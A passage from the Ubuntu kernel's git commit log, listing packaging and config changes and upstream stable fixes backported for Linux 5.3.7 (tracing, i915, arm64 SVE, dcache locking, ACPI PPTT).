Acked-by: Seth Forshee <seth.forshee@canonical.com>
Acked-by: Kleber Sacilotto de Souza <kleber.souza@canonical.com>
[ klebers:
  - adjusted configs after running 'updateconfigs'
  - updated the annotations file
  - removed 'snd-sof-nocodec' from previous ABI module list. ]
Signed-off-by: Kleber Sacilotto de Souza <kleber.souza@canonical.com>
4 years agoUBUNTU: [Config] Remove deselected modules
Khalid Elmously [Wed, 23 Oct 2019 09:48:01 +0000 (05:48 -0400)]
UBUNTU: [Config] Remove deselected modules

BugLink: https://bugs.launchpad.net/bugs/1848750
"08ff70e48d68b staging/fbtft: Depend on OF" deselected a bunch of modules

Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>
4 years agoUBUNTU: [Config] Remove Rio500
Khalid Elmously [Wed, 23 Oct 2019 08:55:06 +0000 (04:55 -0400)]
UBUNTU: [Config] Remove Rio500

BugLink: https://bugs.launchpad.net/bugs/1848750
Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>
[ klebers: fixed the BugLink link. ]
Signed-off-by: Kleber Sacilotto de Souza <kleber.souza@canonical.com>
4 years agoUBUNTU: update dkms package versions
Khalid Elmously [Wed, 23 Oct 2019 08:27:27 +0000 (04:27 -0400)]
UBUNTU: update dkms package versions

Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>
4 years agoUBUNTU: link-to-tracker: update tracking bug
Khalid Elmously [Wed, 23 Oct 2019 06:39:48 +0000 (02:39 -0400)]
UBUNTU: link-to-tracker: update tracking bug

BugLink: https://bugs.launchpad.net/bugs/1849064
Properties: no-test-build
Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>
4 years agoUBUNTU: Start new release
Khalid Elmously [Wed, 23 Oct 2019 06:39:04 +0000 (02:39 -0400)]
UBUNTU: Start new release

Ignore: yes
Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>
4 years agoUBUNTU: [Packaging] Remove now un-used modules for amd64
Connor Kuehl [Mon, 21 Oct 2019 18:53:28 +0000 (11:53 -0700)]
UBUNTU: [Packaging] Remove now un-used modules for amd64

BugLink: https://bugs.launchpad.net/bugs/1848750
Ubuntu commit 5ea50223b4ea ("staging/fbtft: Depend on OF") updates a
config option to depend on OF which is not set on amd64. As a result,
these modules are precluded now.

Signed-off-by: Connor Kuehl <connor.kuehl@canonical.com>
Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>
4 years agoUBUNTU: [Packaging] remove rtc-bd70528 from modules
Connor Kuehl [Fri, 18 Oct 2019 19:24:27 +0000 (12:24 -0700)]
UBUNTU: [Packaging] remove rtc-bd70528 from modules

BugLink: https://bugs.launchpad.net/bugs/1848047
This was removed in Ubuntu commit 9a5a7c0c2675 ("UBUNTU: [Config] add
rtc-bd70528 to modules.ignore")

Signed-off-by: Connor Kuehl <connor.kuehl@canonical.com>
Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>
4 years agoLinux 5.3.7
Greg Kroah-Hartman [Thu, 17 Oct 2019 20:47:33 +0000 (13:47 -0700)]
Linux 5.3.7

BugLink: https://bugs.launchpad.net/bugs/1848750
Signed-off-by: Connor Kuehl <connor.kuehl@canonical.com>
Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>
4 years agoefi/tpm: Fix sanity check of unsigned tbl_size being less than zero
Colin Ian King [Tue, 8 Oct 2019 10:01:53 +0000 (11:01 +0100)]
efi/tpm: Fix sanity check of unsigned tbl_size being less than zero

BugLink: https://bugs.launchpad.net/bugs/1848750
commit be59d57f98065af0b8472f66a0a969207b168680 upstream.

Currently the check for tbl_size being less than zero is always false
because tbl_size is unsigned. Fix this by making it a signed int.

Addresses-Coverity: ("Unsigned compared against 0")
Signed-off-by: Colin Ian King <colin.king@canonical.com>
Cc: Ard Biesheuvel <ard.biesheuvel@linaro.org>
Cc: Jerry Snitselaar <jsnitsel@redhat.com>
Cc: Linus Torvalds <torvalds@linux-foundation.org>
Cc: Peter Zijlstra <peterz@infradead.org>
Cc: Thomas Gleixner <tglx@linutronix.de>
Cc: kernel-janitors@vger.kernel.org
Cc: linux-efi@vger.kernel.org
Fixes: e658c82be556 ("efi/tpm: Only set 'efi_tpm_final_log_size' after successful event log parsing")
Link: https://lkml.kernel.org/r/20191008100153.8499-1-colin.king@canonical.com
Signed-off-by: Ingo Molnar <mingo@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Connor Kuehl <connor.kuehl@canonical.com>
Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>
4 years agoio_uring: only flush workqueues on fileset removal
Jens Axboe [Wed, 9 Oct 2019 20:40:13 +0000 (14:40 -0600)]
io_uring: only flush workqueues on fileset removal

BugLink: https://bugs.launchpad.net/bugs/1848750
commit 8a99734081775c012a4a6c442fdef0379fe52bdf upstream.

We should not remove the workqueue, we just need to ensure that the
workqueues are synced. The workqueues are torn down on ctx removal.

Cc: stable@vger.kernel.org
Fixes: 6b06314c47e1 ("io_uring: add file set registration")
Reported-by: Stefan Hajnoczi <stefanha@redhat.com>
Signed-off-by: Jens Axboe <axboe@kernel.dk>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Connor Kuehl <connor.kuehl@canonical.com>
Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>
4 years agox86/asm: Fix MWAITX C-state hint value
Janakarajan Natarajan [Mon, 7 Oct 2019 19:00:22 +0000 (19:00 +0000)]
x86/asm: Fix MWAITX C-state hint value

BugLink: https://bugs.launchpad.net/bugs/1848750
commit 454de1e7d970d6bc567686052329e4814842867c upstream.

As per "AMD64 Architecture Programmer's Manual Volume 3: General-Purpose
and System Instructions", MWAITX EAX[7:4]+1 specifies the optional hint
of the optimized C-state. For C0 state, EAX[7:4] should be set to 0xf.

Currently, a value of 0xf is set for EAX[3:0] instead of EAX[7:4]. Fix
this by changing MWAITX_DISABLE_CSTATES from 0xf to 0xf0.

This hasn't had any implications so far because setting reserved bits in
EAX is simply ignored by the CPU.

 [ bp: Fixup comment in delay_mwaitx() and massage. ]

Signed-off-by: Janakarajan Natarajan <Janakarajan.Natarajan@amd.com>
Signed-off-by: Borislav Petkov <bp@suse.de>
Cc: Frederic Weisbecker <frederic@kernel.org>
Cc: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Cc: "H. Peter Anvin" <hpa@zytor.com>
Cc: Ingo Molnar <mingo@redhat.com>
Cc: Thomas Gleixner <tglx@linutronix.de>
Cc: "x86@kernel.org" <x86@kernel.org>
Cc: Zhenzhong Duan <zhenzhong.duan@oracle.com>
Cc: <stable@vger.kernel.org>
Link: https://lkml.kernel.org/r/20191007190011.4859-1-Janakarajan.Natarajan@amd.com
Signed-off-by: Ingo Molnar <mingo@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Connor Kuehl <connor.kuehl@canonical.com>
Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>
4 years agomtd: rawnand: au1550nd: Fix au_read_buf16() prototype
Paul Burton [Fri, 4 Oct 2019 18:41:30 +0000 (18:41 +0000)]
mtd: rawnand: au1550nd: Fix au_read_buf16() prototype

BugLink: https://bugs.launchpad.net/bugs/1848750
commit df8fed831cbcdce7b283b2d9c1aadadcf8940d05 upstream.

Commit 7e534323c416 ("mtd: rawnand: Pass a nand_chip object to
chip->read_xxx() hooks") modified the prototype of the struct nand_chip
read_buf function pointer. In the au1550nd driver we have 2
implementations of read_buf. The previously mentioned commit modified
the au_read_buf() implementation to match the function pointer, but not
au_read_buf16(). This results in a compiler warning for MIPS
db1xxx_defconfig builds:

  drivers/mtd/nand/raw/au1550nd.c:443:57:
    warning: pointer type mismatch in conditional expression

Fix this by updating the prototype of au_read_buf16() to take a struct
nand_chip pointer as its first argument, as is expected after commit
7e534323c416 ("mtd: rawnand: Pass a nand_chip object to chip->read_xxx()
hooks").

Note that this shouldn't have caused any functional issues at runtime,
since the offset of the struct mtd_info within struct nand_chip is 0
making mtd_to_nand() effectively a type-cast.

Signed-off-by: Paul Burton <paul.burton@mips.com>
Fixes: 7e534323c416 ("mtd: rawnand: Pass a nand_chip object to chip->read_xxx() hooks")
Cc: stable@vger.kernel.org # v4.20+
Reviewed-by: Boris Brezillon <boris.brezillon@collabora.com>
Signed-off-by: Miquel Raynal <miquel.raynal@bootlin.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Connor Kuehl <connor.kuehl@canonical.com>
Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>
4 years agohwmon: Fix HWMON_P_MIN_ALARM mask
Nuno Sá [Tue, 24 Sep 2019 12:49:43 +0000 (14:49 +0200)]
hwmon: Fix HWMON_P_MIN_ALARM mask

BugLink: https://bugs.launchpad.net/bugs/1848750
commit 30945d31e5761436d9eba6b8cff468a5f7c9c266 upstream.

Both HWMON_P_MIN_ALARM and HWMON_P_MAX_ALARM were using
BIT(hwmon_power_max_alarm).

Fixes: aa7f29b07c870 ("hwmon: Add support for power min, lcrit, min_alarm and lcrit_alarm")
CC: <stable@vger.kernel.org>
Signed-off-by: Nuno Sá <nuno.sa@analog.com>
Link: https://lore.kernel.org/r/20190924124945.491326-2-nuno.sa@analog.com
Signed-off-by: Guenter Roeck <linux@roeck-us.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Connor Kuehl <connor.kuehl@canonical.com>
Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>
4 years agotracing: Get trace_array reference for available_tracers files
Steven Rostedt (VMware) [Fri, 11 Oct 2019 22:19:17 +0000 (18:19 -0400)]
tracing: Get trace_array reference for available_tracers files

BugLink: https://bugs.launchpad.net/bugs/1848750
commit 194c2c74f5532e62c218adeb8e2b683119503907 upstream.

As instances may have different tracers available, we need to look at the
trace_array descriptor that shows the list of the available tracers for the
instance. But there's a race between opening the file and an admin
deleting the instance. The trace_array_get() needs to be called before
accessing the trace_array.

Cc: stable@vger.kernel.org
Fixes: 607e2ea167e56 ("tracing: Set up infrastructure to allow tracers for instances")
Signed-off-by: Steven Rostedt (VMware) <rostedt@goodmis.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Connor Kuehl <connor.kuehl@canonical.com>
Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>
4 years agoftrace: Get a reference counter for the trace_array on filter files
Steven Rostedt (VMware) [Fri, 11 Oct 2019 21:56:57 +0000 (17:56 -0400)]
ftrace: Get a reference counter for the trace_array on filter files

BugLink: https://bugs.launchpad.net/bugs/1848750
commit 9ef16693aff8137faa21d16ffe65bb9832d24d71 upstream.

The ftrace set_ftrace_filter and set_ftrace_notrace files are specific for
an instance now. They need to take a reference to the instance otherwise
there could be a race between accessing the files and deleting the instance.

It wasn't until the :mod: caching where these file operations started
referencing the trace_array directly.

Cc: stable@vger.kernel.org
Fixes: 673feb9d76ab3 ("ftrace: Add :mod: caching infrastructure to trace_array")
Signed-off-by: Steven Rostedt (VMware) <rostedt@goodmis.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Connor Kuehl <connor.kuehl@canonical.com>
Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>
4 years agotracing/hwlat: Don't ignore outer-loop duration when calculating max_latency
Srivatsa S. Bhat (VMware) [Thu, 10 Oct 2019 18:51:01 +0000 (11:51 -0700)]
tracing/hwlat: Don't ignore outer-loop duration when calculating max_latency

BugLink: https://bugs.launchpad.net/bugs/1848750
commit fc64e4ad80d4b72efce116f87b3174f0b7196f8e upstream.

max_latency is intended to record the maximum ever observed hardware
latency, which may occur in either part of the loop (inner/outer). So
we need to also consider the outer-loop sample when updating
max_latency.

Link: http://lkml.kernel.org/r/157073345463.17189.18124025522664682811.stgit@srivatsa-ubuntu
Fixes: e7c15cd8a113 ("tracing: Added hardware latency tracer")
Cc: stable@vger.kernel.org
Signed-off-by: Srivatsa S. Bhat (VMware) <srivatsa@csail.mit.edu>
Signed-off-by: Steven Rostedt (VMware) <rostedt@goodmis.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Connor Kuehl <connor.kuehl@canonical.com>
Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>
4 years agotracing/hwlat: Report total time spent in all NMIs during the sample
Srivatsa S. Bhat (VMware) [Thu, 10 Oct 2019 18:50:46 +0000 (11:50 -0700)]
tracing/hwlat: Report total time spent in all NMIs during the sample

BugLink: https://bugs.launchpad.net/bugs/1848750
commit 98dc19c11470ee6048aba723d77079ad2cda8a52 upstream.

nmi_total_ts is supposed to record the total time spent in *all* NMIs
that occur on the given CPU during the (active portion of the)
sampling window. However, the code seems to be overwriting this
variable for each NMI, thereby only recording the time spent in the
most recent NMI. Fix it by accumulating the duration instead.

Link: http://lkml.kernel.org/r/157073343544.17189.13911783866738671133.stgit@srivatsa-ubuntu
Fixes: 7b2c86250122 ("tracing: Add NMI tracing in hwlat detector")
Cc: stable@vger.kernel.org
Signed-off-by: Srivatsa S. Bhat (VMware) <srivatsa@csail.mit.edu>
Signed-off-by: Steven Rostedt (VMware) <rostedt@goodmis.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Connor Kuehl <connor.kuehl@canonical.com>
Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>
4 years agoarm64/sve: Fix wrong free for task->thread.sve_state
Masayoshi Mizuma [Mon, 30 Sep 2019 20:56:00 +0000 (16:56 -0400)]
arm64/sve: Fix wrong free for task->thread.sve_state

BugLink: https://bugs.launchpad.net/bugs/1848750
commit 4585fc59c0e813188d6a4c5de1f6976fce461fc2 upstream.

The system which has SVE feature crashed because of
the memory pointed by task->thread.sve_state was destroyed
by someone.

That is because sve_state is freed while the forking the
child process. The child process has the pointer of sve_state
which is same as the parent's because the child's task_struct
is copied from the parent's one. If the copy_process()
fails as an error on somewhere, for example, copy_creds(),
then the sve_state is freed even if the parent is alive.
The flow is as follows.

copy_process
        p = dup_task_struct
            => arch_dup_task_struct
                *dst = *src;  // copy the entire region.
:
        retval = copy_creds
        if (retval < 0)
                goto bad_fork_free;
:
bad_fork_free:
...
        delayed_free_task(p);
          => free_task
             => arch_release_task_struct
                => fpsimd_release_task
                   => __sve_free
                      => kfree(task->thread.sve_state);
                         // free the parent's sve_state

Move child's sve_state = NULL and clearing TIF_SVE flag
to arch_dup_task_struct() so that the child doesn't free the
parent's one.
There is no need to wait until copy_process() to clear TIF_SVE for
dst, because the thread flags for dst are initialized already by
copying the src task_struct.
This change simplifies the code, so get rid of comments that are no
longer needed.

As a note, arm64 used to have thread_info on the stack. So it
would not be possible to clear TIF_SVE until the stack is initialized.
From commit c02433dd6de3 ("arm64: split thread_info from task stack"),
the thread_info is part of the task, so it should be valid to modify
the flag from arch_dup_task_struct().

Cc: stable@vger.kernel.org # 4.15.x-
Fixes: bc0ee4760364 ("arm64/sve: Core task context handling")
Signed-off-by: Masayoshi Mizuma <m.mizuma@jp.fujitsu.com>
Reported-by: Hidetoshi Seto <seto.hidetoshi@jp.fujitsu.com>
Suggested-by: Dave Martin <Dave.Martin@arm.com>
Reviewed-by: Dave Martin <Dave.Martin@arm.com>
Tested-by: Julien Grall <julien.grall@arm.com>
Signed-off-by: Will Deacon <will@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Connor Kuehl <connor.kuehl@canonical.com>
Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>
4 years agomedia: stkwebcam: fix runtime PM after driver unbind
Johan Hovold [Tue, 1 Oct 2019 08:49:08 +0000 (10:49 +0200)]
media: stkwebcam: fix runtime PM after driver unbind

BugLink: https://bugs.launchpad.net/bugs/1848750
commit 30045f2174aab7fb4db7a9cf902d0aa6c75856a7 upstream.

Since commit c2b71462d294 ("USB: core: Fix bug caused by duplicate
interface PM usage counter") USB drivers must always balance their
runtime PM gets and puts, including when the driver has already been
unbound from the interface.

Leaving the interface with a positive PM usage counter would prevent a
later bound driver from suspending the device.

Note that runtime PM has never actually been enabled for this driver
since the support_autosuspend flag in its usb_driver struct is not set.

Fixes: c2b71462d294 ("USB: core: Fix bug caused by duplicate interface PM usage counter")
Cc: stable <stable@vger.kernel.org>
Acked-by: Mauro Carvalho Chehab <mchehab+samsung@kernel.org>
Signed-off-by: Johan Hovold <johan@kernel.org>
Link: https://lore.kernel.org/r/20191001084908.2003-5-johan@kernel.org
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Connor Kuehl <connor.kuehl@canonical.com>
Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>
4 years agodrm/msm: Use the correct dma_sync calls harder
Rob Clark [Wed, 4 Sep 2019 16:56:03 +0000 (09:56 -0700)]
drm/msm: Use the correct dma_sync calls harder

BugLink: https://bugs.launchpad.net/bugs/1848750
commit 9f614197c744002f9968e82c649fdf7fe778e1e7 upstream.

Looks like the dma_sync calls don't do what we want on armv7 either.
Fixes:

  Unable to handle kernel paging request at virtual address 50001000
  pgd = (ptrval)
  [50001000] *pgd=00000000
  Internal error: Oops: 805 [#1] SMP ARM
  Modules linked in:
  CPU: 0 PID: 1 Comm: swapper/0 Not tainted 5.3.0-rc6-00271-g9f159ae07f07 #4
  Hardware name: Freescale i.MX53 (Device Tree Support)
  PC is at v7_dma_clean_range+0x20/0x38
  LR is at __dma_page_cpu_to_dev+0x28/0x90
  pc : [<c011c76c>]    lr : [<c01181c4>]    psr: 20000013
  sp : d80b5a88  ip : de96c000  fp : d840ce6c
  r10: 00000000  r9 : 00000001  r8 : d843e010
  r7 : 00000000  r6 : 00008000  r5 : ddb6c000  r4 : 00000000
  r3 : 0000003f  r2 : 00000040  r1 : 50008000  r0 : 50001000
  Flags: nzCv  IRQs on  FIQs on  Mode SVC_32  ISA ARM  Segment none
  Control: 10c5387d  Table: 70004019  DAC: 00000051
  Process swapper/0 (pid: 1, stack limit = 0x(ptrval))

Signed-off-by: Rob Clark <robdclark@chromium.org>
Fixes: 3de433c5b38a ("drm/msm: Use the correct dma_sync calls in msm_gem")
Tested-by: Fabio Estevam <festevam@gmail.com>
Signed-off-by: Fabio Estevam <festevam@gmail.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Connor Kuehl <connor.kuehl@canonical.com>
Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>
4 years agodrm/i915: Mark contents as dirty on a write fault
Chris Wilson [Fri, 20 Sep 2019 12:18:21 +0000 (13:18 +0100)]
drm/i915: Mark contents as dirty on a write fault

BugLink: https://bugs.launchpad.net/bugs/1848750
commit b925708f28c2b7a3a362d709bd7f77bc75c1daac upstream.

Since dropping the set-to-gtt-domain in commit a679f58d0510 ("drm/i915:
Flush pages on acquisition"), we no longer mark the contents as dirty on
a write fault. This has the issue of us then not marking the pages as
dirty on releasing the buffer, which means the contents are not written
out to the swap device (should we ever pick that buffer as a victim).
Notably, this is visible in the dumb buffer interface used for cursors.
Having updated the cursor contents via mmap, and swapped away, if the
shrinker should evict the old cursor, upon next reuse, the cursor would
be invisible.

E.g. echo 80 > /proc/sys/kernel/sysrq ; echo f > /proc/sysrq-trigger

Bugzilla: https://bugs.freedesktop.org/show_bug.cgi?id=111541
Fixes: a679f58d0510 ("drm/i915: Flush pages on acquisition")
Signed-off-by: Chris Wilson <chris@chris-wilson.co.uk>
Cc: Matthew Auld <matthew.william.auld@gmail.com>
Cc: Ville Syrjälä <ville.syrjala@linux.intel.com>
Cc: <stable@vger.kernel.org> # v5.2+
Reviewed-by: Matthew Auld <matthew.william.auld@gmail.com>
Link: https://patchwork.freedesktop.org/patch/msgid/20190920121821.7223-1-chris@chris-wilson.co.uk
(cherry picked from commit 5028851cdfdf78dc22eacbc44a0ab0b3f599ee4a)
Signed-off-by: Rodrigo Vivi <rodrigo.vivi@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Connor Kuehl <connor.kuehl@canonical.com>
Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>
4 years agodrm/i915: Whitelist COMMON_SLICE_CHICKEN2
Kenneth Graunke [Wed, 11 Sep 2019 01:48:01 +0000 (18:48 -0700)]
drm/i915: Whitelist COMMON_SLICE_CHICKEN2

BugLink: https://bugs.launchpad.net/bugs/1848750
commit 282b7fd5f5ab4eba499e1162c1e2802c6d0bb82e upstream.

This allows userspace to use "legacy" mode for push constants, where
they are committed at 3DPRIMITIVE or flush time, rather than being
committed at 3DSTATE_BINDING_TABLE_POINTERS_XS time.  Gen6-8 and Gen11
both use the "legacy" behavior - only Gen9 works in the "new" way.

Conflating push constants with binding tables is painful for userspace,
we would like to be able to avoid doing so.

Signed-off-by: Kenneth Graunke <kenneth@whitecape.org>
Cc: stable@vger.kernel.org
Reviewed-by: Chris Wilson <chris@chris-wilson.co.uk>
Signed-off-by: Chris Wilson <chris@chris-wilson.co.uk>
Link: https://patchwork.freedesktop.org/patch/msgid/20190911014801.26821-1-kenneth@whitecape.org
(cherry picked from commit 0606259e3b3a1220a0f04a92a1654a3f674f47ee)
Signed-off-by: Rodrigo Vivi <rodrigo.vivi@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Connor Kuehl <connor.kuehl@canonical.com>
Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>
4 years agodrm/i915: Bump skl+ max plane width to 5k for linear/x-tiled
Ville Syrjälä [Thu, 5 Sep 2019 13:50:43 +0000 (16:50 +0300)]
drm/i915: Bump skl+ max plane width to 5k for linear/x-tiled

BugLink: https://bugs.launchpad.net/bugs/1848750
commit dc7890995e04bacb45ab21e0daaeae1e7c803eb3 upstream.

The officially validated plane width limit is 4k on skl+, however
we already had people using 5k displays before we started to enforce
the limit. Also it seems Windows allows 5k resolutions as well
(though not sure if they do it with one plane or two).

According to hw folks 5k should work with the possible
exception of the following features:
- Ytile (already limited to 4k)
- FP16 (already limited to 4k)
- render compression (already limited to 4k)
- KVMR sprite and cursor (don't care)
- horizontal panning (need to verify this)
- pipe and plane scaling (need to verify this)

So apart from last two items on that list we are already
fine. We should really verify what happens with those last
two items but I don't have a 5k display on hand atm so it'll
have to wait.

In the meantime let's just bump the limit back up to 5k since
several users have already been using it without apparent issues.
At least we'll be no worse off than we were prior to lowering
the limits.

Cc: stable@vger.kernel.org
Cc: Sean Paul <sean@poorly.run>
Cc: José Roberto de Souza <jose.souza@intel.com>
Tested-by: Leho Kraav <leho@kraav.com>
Fixes: 372b9ffb5799 ("drm/i915: Fix skl+ max plane width")
Bugzilla: https://bugs.freedesktop.org/show_bug.cgi?id=111501
Signed-off-by: Ville Syrjälä <ville.syrjala@linux.intel.com>
Link: https://patchwork.freedesktop.org/patch/msgid/20190905135044.2001-1-ville.syrjala@linux.intel.com
Reviewed-by: Maarten Lankhorst <maarten.lankhorst@linux.intel.com>
Reviewed-by: Sean Paul <sean@poorly.run>
(cherry picked from commit bed34ef544f9ab37ab349c04cf4142282c4dcf5d)
Signed-off-by: Rodrigo Vivi <rodrigo.vivi@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Connor Kuehl <connor.kuehl@canonical.com>
Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>
4 years agoFix the locking in dcache_readdir() and friends
Al Viro [Sun, 15 Sep 2019 16:12:39 +0000 (12:12 -0400)]
Fix the locking in dcache_readdir() and friends

BugLink: https://bugs.launchpad.net/bugs/1848750
commit d4f4de5e5ef8efde85febb6876cd3c8ab1631999 upstream.

There are two problems in dcache_readdir() - one is that lockless traversal
of the list needs non-trivial cooperation of d_alloc() (at least a switch
to list_add_rcu(), and probably more than just that) and another is that
it assumes that no removal will happen without the directory locked exclusive.
Said assumption had always been there, never had been stated explicitly and
is violated by several places in the kernel (devpts and selinuxfs).

        * replacement of next_positive() with different calling conventions:
it returns struct list_head * instead of struct dentry *; the latter is
passed in and out by reference, grabbing the result and dropping the original
value.
        * scan is under ->d_lock.  If we run out of timeslice, cursor is moved
after the last position we'd reached and we reschedule; then the scan continues
from that place.  To avoid livelocks between multiple lseek() (with cursors
getting moved past each other, never reaching the real entries) we always
skip the cursors, need_resched() or not.
        * returned list_head * is either ->d_child of dentry we'd found or
->d_subdirs of parent (if we got to the end of the list).
        * dcache_readdir() and dcache_dir_lseek() switched to new helper.
dcache_readdir() always holds a reference to dentry passed to dir_emit() now.
Cursor is moved to just before the entry where dir_emit() has failed or into
the very end of the list, if we'd run out.
        * move_cursor() eliminated - it had sucky calling conventions and
after fixing that it became simply list_move() (in lseek and scan_positives)
or list_move_tail() (in readdir).

        All operations with the list are under ->d_lock now, and we do not
depend upon having all file removals done with parent locked exclusive
anymore.

Cc: stable@vger.kernel.org
Reported-by: "zhengbin (A)" <zhengbin13@huawei.com>
Signed-off-by: Al Viro <viro@zeniv.linux.org.uk>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Connor Kuehl <connor.kuehl@canonical.com>
Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>
4 years agoiio: light: fix vcnl4000 devicetree hooks
Marco Felsch [Tue, 17 Sep 2019 14:56:36 +0000 (16:56 +0200)]
iio: light: fix vcnl4000 devicetree hooks

BugLink: https://bugs.launchpad.net/bugs/1848750
[ Upstream commit 1436a78c63495dd94c8d4f84a76d78d5317d481b ]

Since commit ebd457d55911 ("iio: light: vcnl4000 add devicetree hooks")
the of_match_table is supported but the data shouldn't be a string.
Instead it shall be one of 'enum vcnl4000_device_ids'. Also the matching
logic for the vcnl4020 was wrong. Since the data retrieve mechanism is
still based on the i2c_device_id no failures did appeared till now.

Fixes: ebd457d55911 ("iio: light: vcnl4000 add devicetree hooks")
Signed-off-by: Marco Felsch <m.felsch@pengutronix.de>
Reviewed-by: Angus Ainslie (Purism) angus@akkea.ca
Cc: <Stable@vger.kernel.org>
Signed-off-by: Jonathan Cameron <Jonathan.Cameron@huawei.com>
Signed-off-by: Sasha Levin <sashal@kernel.org>
Signed-off-by: Connor Kuehl <connor.kuehl@canonical.com>
Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>
4 years agoarm64: topology: Use PPTT to determine if PE is a thread
Jeremy Linton [Mon, 14 Oct 2019 11:56:02 +0000 (19:56 +0800)]
arm64: topology: Use PPTT to determine if PE is a thread

BugLink: https://bugs.launchpad.net/bugs/1848750
Commit 98dc19902a0b2e5348e43d6a2c39a0a7d0fc639e upstream.

ACPI 6.3 adds a thread flag to represent if a CPU/PE is
actually a thread. Given that the MPIDR_MT bit may not
represent this information consistently on homogeneous machines
we should prefer the PPTT flag if its available.

Signed-off-by: Jeremy Linton <jeremy.linton@arm.com>
Reviewed-by: Sudeep Holla <sudeep.holla@arm.com>
Reviewed-by: Robert Richter <rrichter@marvell.com>
[will: made acpi_cpu_is_threaded() return 'bool']
Signed-off-by: Will Deacon <will@kernel.org>
Signed-off-by: John Garry <john.garry@huawei.com>
Signed-off-by: Sasha Levin <sashal@kernel.org>
Signed-off-by: Connor Kuehl <connor.kuehl@canonical.com>
Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>
4 years agoACPI/PPTT: Add support for ACPI 6.3 thread flag
Jeremy Linton [Mon, 14 Oct 2019 11:56:01 +0000 (19:56 +0800)]
ACPI/PPTT: Add support for ACPI 6.3 thread flag

BugLink: https://bugs.launchpad.net/bugs/1848750
Commit bbd1b70639f785a970d998f35155c713f975e3ac upstream.

ACPI 6.3 adds a flag to the CPU node to indicate whether
the given PE is a thread. Add a function to return that
information for a given linux logical CPU.

Signed-off-by: Jeremy Linton <jeremy.linton@arm.com>
Reviewed-by: Sudeep Holla <sudeep.holla@arm.com>
Reviewed-by: Robert Richter <rrichter@marvell.com>
Acked-by: Rafael J. Wysocki <rafael.j.wysocki@intel.com>
Signed-off-by: Will Deacon <will@kernel.org>
Signed-off-by: John Garry <john.garry@huawei.com>
Signed-off-by: Sasha Levin <sashal@kernel.org>
Signed-off-by: Connor Kuehl <connor.kuehl@canonical.com>
Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>
4 years agoRDMA/vmw_pvrdma: Free SRQ only once
Adit Ranadive [Wed, 18 Sep 2019 23:08:00 +0000 (23:08 +0000)]
RDMA/vmw_pvrdma: Free SRQ only once

BugLink: https://bugs.launchpad.net/bugs/1848750
commit 18545e8b6871d21aa3386dc42867138da9948a33 upstream.

An extra kfree cleanup was missed since these are now deallocated by core.

Link: https://lore.kernel.org/r/1568848066-12449-1-git-send-email-aditr@vmware.com
Cc: <stable@vger.kernel.org>
Fixes: 68e326dea1db ("RDMA: Handle SRQ allocations by IB/core")
Signed-off-by: Adit Ranadive <aditr@vmware.com>
Reviewed-by: Vishnu Dasa <vdasa@vmware.com>
Reviewed-by: Jason Gunthorpe <jgg@mellanox.com>
Signed-off-by: Jason Gunthorpe <jgg@mellanox.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Connor Kuehl <connor.kuehl@canonical.com>
Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>
4 years agoMIPS: elf_hwcap: Export userspace ASEs
Jiaxun Yang [Thu, 10 Oct 2019 15:01:57 +0000 (23:01 +0800)]
MIPS: elf_hwcap: Export userspace ASEs

BugLink: https://bugs.launchpad.net/bugs/1848750
commit 38dffe1e4dde1d3174fdce09d67370412843ebb5 upstream.

A Golang developer reported MIPS hwcap isn't reflecting instructions
that the processor actually supported so programs can't apply optimized
code at runtime.

Thus we export the ASEs that can be used in userspace programs.

